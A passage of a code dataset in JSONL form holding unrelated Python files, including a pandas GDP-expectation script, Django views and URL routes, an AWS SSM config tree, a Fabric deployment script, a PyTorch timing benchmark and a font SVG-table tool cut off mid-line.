...\r\n\tref_quarter = ref.month # ... Guarda o trimestre e o ano em ref_quarter e ref_year.\r\n\tref_year = ref.year #\r\n\tdata = pd.DatetimeIndex(file1['date']) # Para a data em que foi feita a projecao ...\r\n\tproj_day = data.day # ... Guarda o dia, mes e ano em proj_day, proj_month e proj_year.\r\n\tproj_month = data.month #\r\n\tproj_year = data.year #\r\n\t# A formula abaixo e' a do Apendice A.\r\n\tquarters_ahead = (ref_year - proj_year)*4 + ref_quarter - (proj_month/3).astype(int) # calcula para quantos trimestres a frente foram feitas as projecoes\r\n\tquarters_ahead.index = data # indexa a serie criada acima pela data em que foi feita a projecao.\r\n\tsdi = pd.Series(file1['mean']) # pega a media da variavel de interesse projetada e cria uma serie pra ela. Poderia ser a mediana 'median'.\r\n\tsdi.index = data # indexa a serie criada acima pela data em que foi feita a projecao.\r\n\tindexes = pd.DataFrame(data=[proj_year, proj_month, proj_day, quarters_ahead]).T # cria um dataframe transposto, com as informãcoes de cada projecao.\r\n\tindexes.columns = (\"year\",\"month\",\"day\",\"quarters_ahead\") # nomeia as colunas\r\n\tindexes.index = data # indexa o dataframe criado acima pela data em que foi feita a projecao.\r\n\tindexes = pd.MultiIndex.from_frame(indexes) # cria um multiindex com o dataframe\r\n\tdf = pd.DataFrame(data=sdi) # cria um dataframe contendo apenas a serie sdi e...\r\n\tdf.index = indexes #... indexa esse dataframe com o multiindexador\r\n\tdf = df.dropna() # remove as observacoes ausentes \"NA\"s.\r\n\tdf = pd.pivot_table(df,values=\"mean\",index=[\"year\",\"month\"],columns=[\"quarters_ahead\"],aggfunc=np.mean) #Agrega em um pivot_table pela media das media dos dias de cada mes\r\n\tdf = df.drop([-1,6],axis=1) # remove as colunas reference_quarters aos trimestres que nao sao de interesse (acima de 5 e abaixo de 0)\r\n\tdf = df.reset_index() # reseta o indexador, para virar um dataframe mais 'limpo'\r\n\tdf = (df.fillna(method=\"ffill\") + df.fillna(method=\"bfill\"))/2 # se sobrou um valor ausente, este sera substituido pela media do valor anterior com o seguinte.\r\n\tdf.index = (df['year']/10).astype('str').str.replace('.','')+pd.Series(np.array([\"m\"]*len(df.index)))+(df['month']/10).astype('str').str.replace('.','') # remove os '.0' criados\r\n\tdf = df.drop(['year','month'], axis=1)\r\n\tdf.columns = pd.Index([\"pib_q0\",\"pib_q1\",\"pib_q2\",\"pib_q3\",\"pib_q4\",\"pib_q5\"],name='data')\r\n\tprint(df)\r\n\tdirec_out = direc[serie][:-4] + '_treated.csv' #renomeia o arquivo\r\n\tdf.to_csv(direc_out)\r\n\tprint('Arquivo .csv criado em:', direc_out)","sub_path":"Tratar_Expectativas_PIB.py","file_name":"Tratar_Expectativas_PIB.py","file_ext":"py","file_size_in_byte":3594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"121869946","text":"from django.urls import path\r\nfrom . import views\r\n\r\nurlpatterns = [\r\n path('', views.post_list, name='post_list'),\r\n \r\n path(\"photogallary/\",views.photogallary,name='photogallary'),\r\n path(\"downloadimage\",views.export,name='export'),\r\n path('comment//remove/', views.comment_remove, name='comment_remove'),\r\n path('photogallary//remove/', views.photogallary_after_remove, name='photogallary_after_remove'),\r\n \r\n]","sub_path":"urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"423130178","text":"import itertools\n\n\ndef is_movable(cur_x, cur_y, next_x, next_y, rectangles):\n x, y = (cur_x + next_x) / 2, (cur_y + next_y) / 2\n is_on_any_border = any(\n (x in (x1, x2) and y1 <= y <= y2) or (y in (y1, y2) and x1 <= x <= x2)\n for x1, y1, x2, y2 in rectangles)\n is_inside_any_rect = any(\n x1 < x < x2 and y1 < y < y2 for x1, y1, x2, y2 in rectangles)\n return is_on_any_border and not is_inside_any_rect\n\n\ndef solution(rectangle, characterX, characterY, itemX, itemY):\n cur_pos = (characterX, characterY)\n prev_pos = None\n for dist in itertools.count():\n if cur_pos == (characterX, characterY) and prev_pos: # 한 바퀴 돌았음 => break\n perimeter = dist\n break\n elif cur_pos == (itemX, itemY):\n dist_to_item = dist\n for dx, dy in ((1, 0), (-1, 0), (0, 1), (0, -1)):\n next_pos = (cur_pos[0] + dx, cur_pos[1] + dy)\n if next_pos != prev_pos and is_movable(*cur_pos, *next_pos,\n rectangle):\n prev_pos, cur_pos = cur_pos, next_pos\n break\n return min(dist_to_item, perimeter - dist_to_item)\n\n\nif __name__ == '__main__':\n print(solution([[1, 1, 7, 4], [3, 2, 5, 5], [4, 3, 6, 9], [2, 6, 8, 8]], 1, 3, 7, 8))\n","sub_path":"프로그래머스연습문제/아이템 줍기.py","file_name":"아이템 줍기.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"66490689","text":"from __future__ import annotations\n\nfrom typing import Any, Dict, List, Optional, Union\n\nimport anytree\nfrom mypy_boto3_ssm import Client\n\n\n__version__ = \"2021.2.1\"\n# TODO: 2021-02-09\n# - refresh all\n# - refresh at path or leaf\n# - auto-fetch from Secrets Manager if leaf.value is an ARN\n\n\ndef get_nested_dict(*, client: Client, path: str, strip_root: bool = True) -> Dict[str, Any]:\n paginator = client.get_paginator(\"get_parameters_by_path\")\n page_iterator = paginator.paginate(Path=path, Recursive=True, WithDecryption=True)\n config = {}\n if strip_root:\n root = len(path) + 1 # Remove root path and leading slash.\n else:\n root = 1 # Remove just the leading slash.\n for page in page_iterator:\n for parameter in page[\"Parameters\"]:\n path = parameter[\"Name\"][root:].split(\"/\")\n base = config\n for part in path[:-1]:\n if part not in base:\n base[part] = {}\n base = base[part]\n base[path[-1]] = parameter[\"Value\"]\n return config\n\n\nclass ConfigNode(anytree.NodeMixin):\n def __init__(\n self,\n name: str,\n value: Optional[str] = None,\n meta: Optional[Dict[str, Any]] = None,\n parent: ConfigNode = None,\n children: List[ConfigNode] = None,\n client: Client = None,\n ):\n super().__init__()\n self.name = name\n self.value = value\n if meta is None:\n meta = {}\n self.meta = meta\n self.parent = parent\n self.client = client\n if children: # set children only if given\n self.children = children\n\n def __repr__(self) -> str:\n if self.is_root:\n rep = f\"{self.__class__.__module__}.ConfigRoot({self.name})\"\n elif self.is_leaf:\n rep = f\"{self.__class__.__module__}.ConfigValue({self.name})\"\n else:\n rep = f\"{self.__class__.__module__}.ConfigPath({self.name})\"\n return rep\n\n def __str__(self) -> str:\n if self.value is not None:\n return self.value\n else:\n return self.__repr__()\n\n def __getitem__(self, name: str) -> ConfigNode:\n resolver = anytree.Resolver(\"name\")\n try:\n return resolver.get(self, name)\n except anytree.ChildResolverError:\n raise KeyError(name)\n\n def __contains__(self, item: Union[str, ConfigNode]) -> bool:\n resolver = anytree.Resolver(\"name\")\n if isinstance(item, self.__class__):\n return item.parent == self\n try:\n resolver.get(self, item)\n return True\n except anytree.ChildResolverError:\n return False\n\n @property\n def full_path(self) -> str:\n return \"/\".join([p.name for p in self.path])\n\n @classmethod\n def create_node_from_parameter(\n cls, *, client: Client, name: str, parameter: Dict[str, Any], parent: Optional[ConfigNode] = None\n ) -> ConfigNode:\n meta = {\n \"type\": parameter[\"Type\"],\n \"arn\": parameter[\"ARN\"],\n \"version\": parameter[\"Version\"],\n \"last_modified_date\": parameter[\"LastModifiedDate\"],\n \"data_type\": parameter[\"DataType\"],\n }\n return cls(name=name, value=parameter[\"Value\"], meta=meta, client=client, parent=parent)\n\n @classmethod\n def create_tree_from_path(cls, *, client: Client, path: str) -> ConfigNode:\n paginator = client.get_paginator(\"get_parameters_by_path\")\n page_iterator = paginator.paginate(Path=path, Recursive=True, WithDecryption=True)\n root = None\n base = None\n for page in page_iterator:\n for parameter in page[\"Parameters\"]:\n path = parameter[\"Name\"].strip(\"/\").split(\"/\")\n # The value of the parameter is only at the leaf node of the full\n # path. We first need to check that all the intermediate paths\n # exists and create them if they don't.\n for part in path[:-1]:\n if base is None:\n root = cls(name=part, client=client)\n base = root\n else:\n if part == base.name:\n continue\n elif part not in base:\n base = cls(name=part, client=client, parent=base)\n else:\n base = base[part]\n # Now we can create the value at the last leaf of the path.\n cls.create_node_from_parameter(client=client, name=path[-1], parameter=parameter, parent=base)\n base = root\n return root\n","sub_path":"src/ssm_params/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"291366433","text":"from tool.get_token import *\n\n\nclass MyTestCase(unittest.TestCase):\n \"\"\"保存游戏状态\"\"\"\n\n def setUp(self):\n self.url = url + \"/play/save-game-states\"\n\n def test_1(self):\n datas['gameId'] = get_gameId()\n datas['state'] = '{\"type\": \"book-save-state-non-chapter\",' \\\n ' \"savedEntityId\":\"1536817660145\",' \\\n '\"timestamp\":1542953873000,' \\\n '\"currentChapterNumber\":1,' \\\n '\"isPinned\":true,' \\\n '\"purchasedPremiumOptions\":[],' \\\n '\"chapterCompletionCounts\":{\"1536817712210\":8}}'\n res = requests.post(url=self.url, data=datas)\n print(res.text)\n self.assertTrue(u\"操作成功\" in res.text)\n\n def tearDown(self):\n time.sleep(1)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"test_case/test_play8.py","file_name":"test_play8.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"235301286","text":"from os import urandom\nfrom fabric.api import cd, env, put, run, sudo, task, local\n\nproject_name = '{{ cookiecutter.repo_name }}'\nenv.hosts = ['root@{{ cookiecutter.repo_name }}.se']\n\nvenv = 'source /var/www/venv/site/bin/activate'\nsite_root = '/var/www/%s/' % project_name\ngit_repo = '{{ cookiecutter.repo_name }}'\ndb_password = urandom(16).encode('hex')\nsecret_key = urandom(32).encode('hex')\n\n@task\ndef setup():\n \"\"\"\n Setup a fresh virtualenv as well as a few useful directories, then run\n a full deployment\n \"\"\"\n\n sudo('yes | apt-get install postgresql postgresql-server-dev-9.1')\n\n sudo('psql -c \"CREATE USER django WITH NOCREATEDB NOCREATEUSER ENCRYPTED PASSWORD E\\'%s\\'\"' % db_password, user='postgres')\n sudo('psql -c \"CREATE DATABASE %s WITH OWNER django\"' % project_name, user='postgres')\n \n sudo('yes | apt-get install python-setuptools libpython-dev python-dev git')\n sudo('easy_install pip')\n sudo('pip install virtualenv')\n sudo('yes | apt-get install nginx')\n sudo('yes | apt-get install uwsgi uwsgi-plugin-python')\n sudo('yes | apt-get install libjpeg-dev libfreetype6 libfreetype6-dev zlib1g-dev')\n\n sudo('mkdir /var/www')\n sudo('chown -R root /var/www/')\n run('mkdir /var/www/venv')\n run('cd /var/www/venv; virtualenv site')\n\n sudo('echo \"export DATABASE_URL=postgres://django:%s@localhost:5432/%s\" >> /var/www/venv/site/bin/activate' % (db_password, project_name))\n sudo('echo \"export SECRET_KEY=\\'%s\\'\" >> /var/www/venv/site/bin/activate' % secret_key)\n sudo('echo \"export DJANGO_SETTINGS_MODULE=%s.settings.production\" >> /var/www/venv/site/bin/activate' % project_name)\n run('cd /var/www; git clone %s' % git_repo)\n \n put('config/nginx/%s' % project_name, '/etc/nginx/sites-available/%s' % project_name, use_sudo=True)\n sudo('ln -s /etc/nginx/sites-available/%s /etc/nginx/sites-enabled/%s' % (project_name, project_name))\n sudo('rm /etc/nginx/sites-enabled/default')\n\n put('config/uwsgi/%s.ini' % project_name, '/etc/uwsgi/apps-available/%s.ini' % project_name, use_sudo=True)\n sudo('echo \"\\nenv = DATABASE_URL=postgres://django:%s@localhost:5432/%s\" >> /etc/uwsgi/apps-available/%s.ini' % (db_password, project_name, project_name))\n sudo('echo \"env = SECRET_KEY=\\'%s\\'\" >> /etc/uwsgi/apps-available/%s.ini' % (secret_key, project_name))\n sudo('ln -s /etc/uwsgi/apps-available/%s.ini /etc/uwsgi/apps-enabled' % project_name)\n\n sudo('chown -R www-data /var/www/')\n\n deploy_migrate_and_static()\n\n@task(alias=\"d\")\ndef basic_deploy():\n with cd(site_root):\n _get_code()\n _install_deps()\n _reload()\n\n@task(alias=\"dm\")\ndef deploy():\n with cd(site_root):\n _get_code()\n _install_deps()\n _migrate()\n _reload()\n\n@task(alias=\"dms\")\ndef deploy_migrate_and_static():\n with cd(site_root):\n _get_code()\n _install_deps()\n _migrate()\n _collectstatic()\n _reload()\n\n@task(alias=\"ds\")\ndef deploy_static():\n with cd(site_root):\n _get_code()\n _install_deps()\n _collectstatic()\n _reload()\n\n@task(alias=\"r\")\ndef reload():\n with cd(site_root):\n _reload()\n\ndef _install_deps():\n sudo(\"%s && pip install -r requirements.txt\" % venv)\n\n\ndef _migrate():\n run(\"%s && python manage.py syncdb\" % venv)\n run(\"%s && python manage.py migrate\" % venv)\n\n\ndef _collectstatic():\n run(\"%s && python manage.py collectstatic -v0 --noinput\" % venv)\n\n\ndef _get_code():\n run(\"git pull origin master\")\n\n\ndef _reload():\n run(\"touch reload\")\n\n@task(alias='mpl')\ndef mirror_production_to_local():\n sudo('pg_dump %s -f /tmp/database.txt' % project_name, user='postgres')\n local('scp %s:/tmp/database.txt /tmp' % env.hosts[0])\n local('sudo su postgres -c \\\"dropdb %s\\\"' % project_name)\n local('sudo su postgres -c \\\"createdb %s\\\"' % project_name)\n local('sudo su postgres -c \\\"psql -d %s -f /tmp/database.txt\\\"' % project_name)\n local('scp -r %s:%s%s/media/uploads/ ./%s/media/' % (env.hosts[0], site_root, project_name, project_name))","sub_path":"{{cookiecutter.repo_name}}/fabfile.py","file_name":"fabfile.py","file_ext":"py","file_size_in_byte":4072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"445281730","text":"\"\"\"\n# echo\n# 1. echo(\"a,b\") => [\"a\", \"b\"]\n# 2. echo(\"a{b,c}\") => [\"ab\", \"ac\"]\n# 3. echo(\"a{b,c{d,e}f}\") => [\"ab\", \"acdf\", \"acef\"]\n# 4. echo(\"a{b,c}{d,f}\") => [\"abd\", \"abf\", \"acd\", \"acf\"]\n# Lessons learnt - First properly understand the question. Then calmly think about questions from 1st principles and then solve them.\n\"\"\"\n\n\ndef split_by_bracket(input_str):\n split_parts = []\n bracket_count = 0\n cur_idx = 0\n prev_idx = 0\n for c in input_str:\n if c == '{':\n bracket_count += 1\n if bracket_count == 1:\n split_parts.append(input_str[prev_idx:cur_idx])\n prev_idx = cur_idx + 1\n elif c == '}':\n bracket_count -= 1\n if bracket_count == 0:\n split_parts.append(input_str[prev_idx:cur_idx])\n prev_idx = cur_idx + 1\n cur_idx += 1\n\n split_parts.append(input_str[prev_idx:cur_idx])\n return split_parts\n\n\ndef split_by_comma(input_str):\n split_parts = []\n bracket_count = 0\n cur_idx = 0\n prev_idx = 0\n for c in input_str:\n if c == '{':\n bracket_count += 1\n elif c == '}':\n bracket_count -= 1\n\n if bracket_count == 0:\n if c == ',':\n split_parts.append(input_str[prev_idx:cur_idx])\n prev_idx = cur_idx + 1\n cur_idx += 1\n\n split_parts.append(input_str[prev_idx:cur_idx])\n\n return split_parts\n\n\ndef echo(input_str):\n parts = split_by_comma(input_str)\n if len(parts) > 1:\n echo_out = []\n for part in parts:\n part_echo_out = echo(part)\n echo_out.extend(part_echo_out)\n return echo_out\n\n parts = split_by_bracket(input_str)\n if len(parts) == 1:\n return [input_str]\n else:\n i = 0\n echo_out = ['']\n for part in parts:\n if i % 2 == 0:\n echo_out = [str + part for str in echo_out]\n else:\n bracket_out = echo(part)\n new_echo_out = []\n for echo_str in echo_out:\n for bracket_str in bracket_out:\n new_echo_out.append(echo_str + bracket_str)\n\n echo_out = new_echo_out\n i += 1\n return echo_out\n\n\nif __name__ == '__main__':\n a = \"a,b\"\n b = \"a{b,c}\"\n c = \"a{b,c{d,e}f}\"\n d = \"a{b,c}{d,f}\"\n e = \"a,b{cd,e{1,2,3}f{4,5}}g,h,i{j,k}\"\n\n print(echo(a))\n print(echo(b))\n print(echo(c))\n print(echo(d))\n print(echo(e))\n","sub_path":"RubkRecursiveEcho.py","file_name":"RubkRecursiveEcho.py","file_ext":"py","file_size_in_byte":2512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"16598387","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport logbook\n\n''' You can override the LOG level from your environment.\n For example, if you want to see the DEBUG messages, run:\n $ export CATALYST_LOG_LEVEL=10\n'''\nLOG_LEVEL = int(os.environ.get('CATALYST_LOG_LEVEL', logbook.INFO))\n\nSYMBOLS_URL = 'https://s3.amazonaws.com/enigmaco/catalyst-exchanges/' \\\n '{exchange}/symbols.json'\n\nDATE_TIME_FORMAT = '%Y-%m-%d %H:%M'\nDATE_FORMAT = '%Y-%m-%d'\n\nAUTO_INGEST = False\n","sub_path":"catalyst/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"214121511","text":"from django.shortcuts import render, get_object_or_404, redirect\nfrom django.contrib.sites.shortcuts import get_current_site\nfrom django.http import Http404\nfrom main.models import Project, customUser\nfrom django.contrib import messages\nfrom .forms import ProjectForm\nfrom django.utils.encoding import force_bytes, force_text\nimport datetime\nfrom main.tokens import account_activation_token\nfrom django.core.paginator import Paginator\nfrom django.utils.http import urlsafe_base64_encode, urlsafe_base64_decode\n\ndef add_edit_project(request, project_id=None):\n if project_id is None:\n edit_action = False\n form = ProjectForm()\n else:\n edit_action = True\n editing_project = get_object_or_404(Project, projectID=project_id)\n if editing_project.industryOwn == request.user:\n form = ProjectForm(instance=editing_project)\n else:\n raise Http404\n if request.method == 'POST':\n if 'delete' in request.POST:\n Project.objects.get(pk=project_id).delete()\n messages.success(request, \"You have successfully deleted this project.\")\n return redirect('/industry/list')\n else:\n form = ProjectForm(request.POST, request.FILES)\n if form.is_valid():\n project = form.save(commit=False)\n if edit_action:\n project.projectID = project_id\n project.industryOwn = request.user\n project.creationDate = editing_project.creationDate\n else:\n project.industryOwn = request.user\n project.creationDate = datetime.datetime.today()\n project.save()\n if edit_action:\n messages.success(request, \"You have successfully edited this project.\")\n return redirect('/industry/project/'+ str(project_id))\n else:\n messages.success(request, \"You have successfully added this project.\")\n return redirect('/industry/list')\n else:\n messages.error(request, \"Fill in all fields correctly.\")\n\n context = {'form':form, 'edit_action':edit_action}\n return render(request, 'industries/AddEditProject.html', context)\n\ndef home(request):\n try:\n user = request.user\n except:\n raise Http404\n reserved_projects = Project.objects.filter(industryOwn=request.user, status=\"Reserved\")\n exploring_projects = Project.objects.filter(industryOwn=request.user, status=\"Exploring\")\n listed_projects = Project.objects.filter(industryOwn=request.user)\n context = {'user':user, 'reserved_projects':reserved_projects, 'exploring_projects':exploring_projects, 'listed_projects':listed_projects}\n return render(request, 'industries/home.html', context)\n\ndef list_projects(request):\n allProjects = Project.objects.filter(industryOwn=request.user)\n showOpen = False\n showReserved = False\n showExploring = False\n showClosed = False\n if request.method == 'POST':\n filteredProjects = []\n if 'filter_option' in request.POST:\n filter_option = int(request.POST['filter_option'])\n if filter_option == 1:\n allProjects = allProjects.order_by('-creationDate')\n if filter_option == 2:\n allProjects = allProjects.order_by('endDate')\n for i in request.POST:\n filter = True\n if i == \"showOpen\":\n showOpen = True\n elif i == \"showReserved\":\n showReserved = True\n elif i == \"showExploring\":\n showExploring = True\n elif i == \"showClosed\":\n showClosed = True\n\n if(showOpen):\n filteredProjects += allProjects.filter(status=\"Open\")\n if(showReserved):\n filteredProjects += allProjects.filter(status=\"Reserved\")\n if(showExploring):\n filteredProjects += allProjects.filter(status=\"Exploring\")\n if(showClosed):\n filteredProjects += allProjects.filter(status=\"Closed\")\n projectList = filteredProjects\n else:\n if 'search' in request.GET:\n search_term = request.GET['search']\n allProjects = allProjects.filter(title__icontains=search_term)\n projectList = allProjects\n paginator = Paginator(projectList, 2)\n page = request.GET.get('page')\n projects = paginator.get_page(page)\n context = {\"AllProjects\":projects, \"Open\":showOpen, \"Reserved\":showReserved, \"Exploring\":showExploring, \"Closed\":showClosed, }\n return render(request, 'industries/myProjects.html', context)\n\ndef view_myproject(request, project_id):\n project = get_object_or_404(Project, projectID=project_id)\n if project.industryOwn != request.user:\n raise Http404\n if project.status == \"Reserved\":\n messages.info(request, \"This project is reserved by a lecturer.\")\n context = {\n 'project': project,\n 'domain': get_current_site(request).domain,\n 'uid':urlsafe_base64_encode(force_bytes(project_id)),\n 'token':account_activation_token.make_token(request.user),\n }\n else:\n context = {'project':project,}\n return render(request, 'industries/project.html', context)\n\ndef myproject_reservation(request, uid, token):\n try:\n uid = force_text(urlsafe_base64_decode(uid))\n project = Project.objects.get(pk=uid)\n except(TypeError, ValueError, OverflowError):\n return HttpResponse('Link expired')\n except (Project.DoesNotExist):\n raise Http404\n if project.industryOwn != request.user:\n raise Http404\n lecturer_id = project.lecturerReserve\n lecturer_publicName = get_object_or_404(customUser, pk=lecturer_id).publicName\n if request.method == \"POST\":\n if 'accept' in request.POST:\n project.status='Exploring'\n project.save()\n messages.success(request, \"You have just accepted the reservation.\")\n return redirect('/industry/')\n return render(request, 'industries/reservationView.html', {'project':project, 'lecturer_publicName': lecturer_publicName})\n\n\n# Create your views here.\n","sub_path":"django_project/industries/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"433536502","text":"import torch\nfrom timeit import timeit\nimport argparse\n\ndef time_multiplication(\n timer_repetitions,\n use_gpu=True,\n data_path=\"/mnt/qb/baumgartner/storagetest.txt\",\n):\n\n # Simulate external data access by reading the matrix size from external file\n with open(data_path) as f:\n s = int(f.read())\n\n # Create tensors\n x = torch.randn(32, s)\n y = torch.randn(s, 32)\n \n # Check if Cuda available and move tensor to Cuda if yes\n cuda_available = torch.cuda.is_available() \n print(f\"Cuda_available={cuda_available}\")\n if cuda_available and use_gpu:\n device = torch.cuda.current_device()\n print(f\"Current Cuda device: {device}\")\n x = x.to(device)\n y = y.to(device)\n\n # Multiply matrix first once for result and then multiple times for measuring elapsed time\n mult = torch.matmul(x, y)\n elapsed_time = timeit(lambda: torch.matmul(x, y), number=timer_repetitions)\n\n # Print some results:\n print(\"result:\")\n print(mult)\n print(\"Output shape\", mult.shape)\n print(f\"elapsed time: {elapsed_time}\")\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser(\n description=\"Tescript for Singularity and SLURM on GPU. It times the multiplication of two matrices, repeated `timer_repetition` times.\"\n )\n parser.add_argument(\n \"--timer_repetitions\", dest=\"timer_repetitions\", action=\"store\", default=1000, type=int, help=\"How many times to repeat the multiplication.\",\n )\n parser.add_argument('--use-gpu', dest='use_gpu', action='store_true')\n parser.add_argument('--no-gpu', dest='use_gpu', action='store_false')\n parser.set_defaults(use_gpu=True)\n args = parser.parse_args()\n\n # Run main function with command line input, to test singularity arguments\n time_multiplication(timer_repetitions=args.timer_repetitions, use_gpu=args.use_gpu)\n\n print(\"done.\")","sub_path":"examples/05_singularity/multiply.py","file_name":"multiply.py","file_ext":"py","file_size_in_byte":1886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"303567723","text":"#!/usr/bin/env python\n\nfrom __future__ import print_function\n\n__doc__=\"\"\"\\\nAdds an SVG table to a font, using SVG files provided.\nThe font format can be either OpenType or TrueType.\n\nUsage:\n python addSVGtable.py [options] -s font\n\nOptions:\n -s path to folder containing SVG files.\n (the file names MUST match the names of the glyphs they're meant to be associated with.)\n -m do not make a copy of the input font.\n -k do not strip the 'viewBox' parameter.\n -w generate WOFF and WOFF2 formats.\n -x comma-separated list of glyph names to exclude.\n -z compress the SVG table.\n\"\"\"\n\n#-----------------------------------------------------------------------------------------\n\nimport os\nimport sys\nimport re\nimport getopt\nfrom shutil import copy2\n\nfontToolsURL = 'https://github.com/fonttools/fonttools'\n\ntry:\n\tfrom fontTools import ttLib\n\tfrom fontTools import version as ftversion\nexcept ImportError:\n\tprint(\"ERROR: FontTools Python module is not installed.\\n\\\n Get the latest version at %s\" % fontToolsURL, file=sys.stderr)\n\tsys.exit(1)\n\nreVerStr = re.compile(r\"^[0-9]+(\\.[0-9]+)?\")\ndef verStr2Num(verStr):\n\tv = reVerStr.match(verStr)\n\tif v:\n\t\treturn eval(v.group(0))\n\treturn 0\n\nminFTversion = '3.0'\nminVersion = verStr2Num(minFTversion)\ncurVersion = verStr2Num(ftversion)\n\nif curVersion < minVersion:\n\tprint(\"ERROR: The FontTools module version must be %s or higher.\\n\\\n You have version %s installed.\\n\\\n Get the latest version at %s\" % (minFTversion, ftversion, fontToolsURL),\n\tfile=sys.stderr)\n\tsys.exit(1)\n\n\ndef readFile(filePath):\n\tf = open(filePath, \"rt\")\n\tdata = f.read()\n\tf.close()\n\treturn data\n\n\ndef getGlyphNameFromFileName(filePath):\n\tfontFileName = os.path.split(filePath)[1]\n\treturn os.path.splitext(fontFileName)[0]\n\n\nreIDvalue = re.compile(r\"]+?(id=\\\".*?\\\").+?>\", re.DOTALL)\n\ndef setIDvalue(data, gid):\n\tid = reIDvalue.search(data)\n\tif id:\n\t\tnewData = re.sub(id.group(1), 'id=\"glyph%s\"' % gid, data)\n\telse:\n\t\tnewData = re.sub(')\", re.DOTALL)\n\ndef stripViewBox(svgItemData):\n\t\"\"\"\n\tRemoves the viewBox parameter from the element.\n\t\"\"\"\n\tvb = reViewBox.search(svgItemData)\n\tif vb:\n\t\tsvgItemData = reViewBox.sub(r\"\\g<1>\\g<3>\", svgItemData)\n\treturn svgItemData\n\n\nreXMLheader = re.compile(r\"<\\?xml .*\\?>\")\nreEnableBkgrd = re.compile(r\"( enable-background=[\\\"|\\'][new\\d, ]+[\\\"|\\'])\")\nreWhiteSpaceBtween = re.compile(r\">\\s+<\", re.MULTILINE)\nreWhiteSpaceWithin = re.compile(r\"\\s+\", re.MULTILINE)\n\ndef cleanupSVGdoc(svgItemData):\n\t# Remove XML header\n\tsvgItemData = reXMLheader.sub('', svgItemData)\n\n\t# Remove all 'enable-background' parameters\n\tfor enableBkgrd in reEnableBkgrd.findall(svgItemData):\n\t\tsvgItemData = svgItemData.replace(enableBkgrd, '')\n\n\t# Remove all white space BETWEEN elements\n\tfor whiteSpace in reWhiteSpaceBtween.findall(svgItemData):\n\t\tsvgItemData = svgItemData.replace(whiteSpace, '><')\n\n\t# Replace all white space WITHIN elements with a single space\n\tfor whiteSpace2 in reWhiteSpaceWithin.findall(svgItemData):\n\t\tsvgItemData = svgItemData.replace(whiteSpace2, ' ')\n\n\treturn svgItemData\n\n\nreCopyCounter = re.compile(\"#\\d+$\")\n\ndef makeFontCopyPath(fontPath):\n\tdirName, fileName = os.path.split(fontPath)\n\tfileName, fileExt = os.path.splitext(fileName)\n\tfileName = reCopyCounter.split(fileName)[0]\n\tfontCopyPath = os.path.join(dirName, fileName + fileExt)\n\tn = 0\n\twhile os.path.exists(fontCopyPath):\n\t\tfontCopyPath = os.path.join(dirName, fileName + \"#\" + repr(n) + fileExt)\n\t\tn += 1\n\treturn fontCopyPath\n\n\ndef processFont(fontPath, svgFilePathsList, options):\n\tfont = ttLib.TTFont(fontPath)\n\n\tsvgDocsDict = {}\n\tgNamesSeenAlreadyList = []\n\n\tsvgGlyphsAdded = 0\n\n\tfor svgFilePath in svgFilePathsList:\n\t\tgName = getGlyphNameFromFileName(svgFilePath)\n\n\t\tif gName in options.glyphNamesToExclude:\n\t\t\tcontinue\n\n\t\ttry:\n\t\t\tgid = font.getGlyphID(gName)\n\t\texcept KeyError:\n\t\t\tprint(\"WARNING: Could not find a glyph named %s in the font %s\" % \\\n\t\t\t (gName, os.path.split(fontPath)[1]), file=sys.stderr)\n\t\t\tcontinue\n\n\t\tif gName in gNamesSeenAlreadyList:\n\t\t\tprint(\"WARNING: Skipped a duplicate file named %s.svg at %s\" % \\\n\t\t\t (gName, svgFilePath), file=sys.stderr)\n\t\t\tcontinue\n\t\telse:\n\t\t\tgNamesSeenAlreadyList.append(gName)\n\n\t\tsvgItemData = readFile(svgFilePath)\n\n\t\t# Set id value\n\t\tsvgItemData = setIDvalue(svgItemData, gid)\n\n\t\t# Remove the viewBox parameter\n\t\tif options.stripViewBox:\n\t\t\tsvgItemData = stripViewBox(svgItemData)\n\n\t\t# Clean-up SVG document\n\t\tsvgItemData = cleanupSVGdoc(svgItemData)\n\n\t\tsvgDocsDict[gid] = [svgItemData.strip(), gid, gid]\n\t\tsvgGlyphsAdded += 1\n\n\t# Don't do any changes to the input font if there's no SVG data\n\tif not svgDocsDict:\n\t\tprint(\"Could not find any SVG files that can be added to the font.\", file=sys.stdout)\n\t\tsys.exit(0)\n\n\tsvgDocsList = [svgDocsDict[index] for index in sorted(svgDocsDict.keys())]\n\n\tsvgTable = ttLib.newTable('SVG ')\n\tsvgTable.compressed = options.compressSVGs\n\tsvgTable.docList = svgDocsList\n\tsvgTable.colorPalettes = None\n\tfont['SVG '] = svgTable\n\n\t# Make copy of the original font\n\tif options.makeFontCopy:\n\t\tfontCopyPath = makeFontCopyPath(fontPath)\n\t\tcopy2(fontPath, fontCopyPath)\n\n\tfont.save(fontPath)\n\n\tif options.generateWOFFs:\n\t\tfont['SVG '].compressed = False # WOFF files are smaller if SVG table is uncompressed\n\t\tfor ext in ['woff', 'woff2']:\n\t\t\twoffFontPath = os.path.splitext(fontPath)[0] + '.' + ext\n\t\t\tfont.flavor = ext\n\t\t\tfont.save(woffFontPath)\n\n\tfont.close()\n\n\tprint(\"%s SVG glyphs were successfully added to %s\" % \\\n\t 